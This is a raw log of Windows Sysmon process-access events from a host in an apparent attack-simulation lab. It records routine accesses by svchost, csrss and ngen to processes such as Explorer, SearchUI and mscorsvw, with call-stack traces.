14:57:34.327{A7A01FEF-B626-607E-0D00-00000000BB01}1008728C:\Windows\system32\svchost.exe{A7A01FEF-C0B1-607E-9B05-00000000BB01}5448C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+b954|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000075019Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:57:34.327{A7A01FEF-B626-607E-0D00-00000000BB01}1008728C:\Windows\system32\svchost.exe{A7A01FEF-C0B1-607E-9B05-00000000BB01}5448C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+b954|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000075018Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:57:34.327{A7A01FEF-B626-607E-0D00-00000000BB01}1008728C:\Windows\system32\svchost.exe{A7A01FEF-C0B1-607E-9B05-00000000BB01}5448C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+b954|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000075017Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:57:34.327{A7A01FEF-B626-607E-0D00-00000000BB01}1008728C:\Windows\system32\svchost.exe{A7A01FEF-C0B1-607E-9B05-00000000BB01}5448C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+b954|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000075016Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:57:34.327{A7A01FEF-B626-607E-0D00-00000000BB01}1008728C:\Windows\system32\svchost.exe{A7A01FEF-C0B1-607E-9B05-00000000BB01}5448C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+b954|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000075015Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:57:34.327{A7A01FEF-B626-607E-0D00-00000000BB01}1008728C:\Windows\system32\svchost.exe{A7A01FEF-C0B1-607E-9B05-00000000BB01}5448C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+b954|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000075014Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:57:34.327{A7A01FEF-B626-607E-0D00-00000000BB01}1008728C:\Windows\system32\svchost.exe{A7A01FEF-C0B1-607E-9B05-00000000BB01}5448C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+b954|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000075013Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:57:34.327{A7A01FEF-B626-607E-0D00-00000000BB01}1008728C:\Windows\system32\svchost.exe{A7A01FEF-C0B1-607E-9B05-00000000BB01}5448C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+b954|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000075012Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:57:34.327{A7A01FEF-B626-607E-0D00-00000000BB01}1008728C:\Windows\system32\svchost.exe{A7A01FEF-C0A6-607E-8105-00000000BB01}836C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+ca3e|c:\windows\system32\rpcss.dll+ba7a|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000075011Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:57:34.327{A7A01FEF-B626-607E-0D00-00000000BB01}1008728C:\Windows\system32\svchost.exe{A7A01FEF-C0A6-607E-8105-00000000BB01}836C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+b954|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000075010Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:57:34.327{A7A01FEF-B626-607E-0D00-00000000BB01}1008728C:\Windows\system32\svchost.exe{A7A01FEF-C0A6-607E-8105-00000000BB01}836C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+ca3e|c:\windows\system32\rpcss.dll+ba7a|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000075009Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:57:34.327{A7A01FEF-B626-607E-0D00-00000000BB01}1008728C:\Windows\system32\svchost.exe{A7A01FEF-C0A6-607E-8105-00000000BB01}836C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+b954|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000075008Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:57:34.327{A7A01FEF-B626-607E-0D00-00000000BB01}1008728C:\Windows\system32\svchost.exe{A7A01FEF-C0A6-607E-8105-00000000BB01}836C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+ca3e|c:\windows\system32\rpcss.dll+ba7a|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000075007Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:57:34.327{A7A01FEF-B626-607E-0D00-00000000BB01}1008728C:\Windows\system32\svchost.exe{A7A01FEF-C0A6-607E-8105-00000000BB01}836C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+b954|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000075006Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:57:34.327{A7A01FEF-B626-607E-0D00-00000000BB01}1008728C:\Windows\system32\svchost.exe{A7A01FEF-C0A6-607E-8105-00000000BB01}836C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+ca3e|c:\windows\system32\rpcss.dll+ba7a|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000075005Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:57:34.327{A7A01FEF-B626-607E-0D00-00000000BB01}1008728C:\Windows\system32\svchost.exe{A7A01FEF-C0A6-607E-8105-00000000BB01}836C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+b954|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000075004Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:57:34.327{A7A01FEF-B626-607E-0D00-00000000BB01}1008728C:\Windows\system32\svchost.exe{A7A01FEF-C0A6-607E-8105-00000000BB01}836C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+ca3e|c:\windows\system32\rpcss.dll+ba7a|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000075003Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:57:34.327{A7A01FEF-B626-607E-0D00-00000000BB01}1008728C:\Windows\system32\svchost.exe{A7A01FEF-C0A6-607E-8105-00000000BB01}836C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+b954|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000075002Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:57:34.327{A7A01FEF-B626-607E-0D00-00000000BB01}1008728C:\Windows\system32\svchost.exe{A7A01FEF-C0A6-607E-8105-00000000BB01}836C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+ca3e|c:\windows\system32\rpcss.dll+ba7a|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000075001Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:57:34.327{A7A01FEF-B626-607E-0D00-00000000BB01}1008728C:\Windows\system32\svchost.exe{A7A01FEF-C0A6-607E-8105-00000000BB01}836C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+b954|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000075000Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:57:34.327{A7A01FEF-B626-607E-0D00-00000000BB01}1008728C:\Windows\system32\svchost.exe{A7A01FEF-C0A6-607E-8105-00000000BB01}836C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+ca3e|c:\windows\system32\rpcss.dll+ba7a|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000074999Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:57:34.327{A7A01FEF-B626-607E-0D00-00000000BB01}1008728C:\Windows\system32\svchost.exe{A7A01FEF-C0A6-607E-8105-00000000BB01}836C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+b954|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000074998Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:57:34.327{A7A01FEF-B626-607E-0D00-00000000BB01}1008728C:\Windows\system32\svchost.exe{A7A01FEF-C0A6-607E-8105-00000000BB01}836C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+ca3e|c:\windows\system32\rpcss.dll+ba7a|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000074997Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:57:34.327{A7A01FEF-B626-607E-0D00-00000000BB01}1008728C:\Windows\system32\svchost.exe{A7A01FEF-C0A6-607E-8105-00000000BB01}836C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+b954|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000074996Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:57:34.280{A7A01FEF-B625-607E-0C00-00000000BB01}6686156C:\Windows\system32\svchost.exe{A7A01FEF-EBDE-607E-E60C-00000000BB01}6988C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000074995Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:57:34.264{A7A01FEF-B624-607E-0500-00000000BB01}644760C:\Windows\system32\csrss.exe{A7A01FEF-EBDE-607E-E60C-00000000BB01}6988C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000074994Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:57:34.264{A7A01FEF-EBDA-607E-C60C-00000000BB01}35124312C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{A7A01FEF-EBDE-607E-E60C-00000000BB01}6988C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x103801C:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e47|C:\Windows\SYSTEM32\ntdll.dll+78135|C:\Windows\SYSTEM32\ntdll.dll+77f9e|C:\Windows\SYSTEM32\ntdll.dll+6f66c(wow64)|C:\Windows\System32\KERNELBASE.dll+d9148(wow64)|C:\Windows\System32\KERNELBASE.dll+d7e2c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+52c7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+3805(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+c9ed(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+cbbe(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d0cd(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+cf32(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d41e(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d6be(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+de85(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+df91(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+e032(wow64) 10341000x800000000000000074993Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:57:34.217{A7A01FEF-B625-607E-0C00-00000000BB01}6686156C:\Windows\system32\svchost.exe{A7A01FEF-EBDE-607E-E50C-00000000BB01}5072C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000074992Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:57:34.202{A7A01FEF-B624-607E-0500-00000000BB01}6442236C:\Windows\system32\csrss.exe{A7A01FEF-EBDE-607E-E50C-00000000BB01}5072C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000074991Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:57:34.202{A7A01FEF-EBDA-607E-C60C-00000000BB01}35124312C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{A7A01FEF-EBDE-607E-E50C-00000000BB01}5072C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x103801C:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e47|C:\Windows\SYSTEM32\ntdll.dll+78135|C:\Windows\SYSTEM32\ntdll.dll+77f9e|C:\Windows\SYSTEM32\ntdll.dll+6f66c(wow64)|C:\Windows\System32\KERNELBASE.dll+d9148(wow64)|C:\Windows\System32\KERNELBASE.dll+d7e2c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+52c7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+3805(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+c9ed(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+cbbe(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d0cd(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+cf32(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d41e(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d6be(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+de85(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+df91(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+e032(wow64) 354300x800000000000000074990Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:57:32.785{A7A01FEF-EBDA-607E-CF0C-00000000BB01}4380C:\Program Files\Microsoft Office\root\Integration\Integrator.exeNT 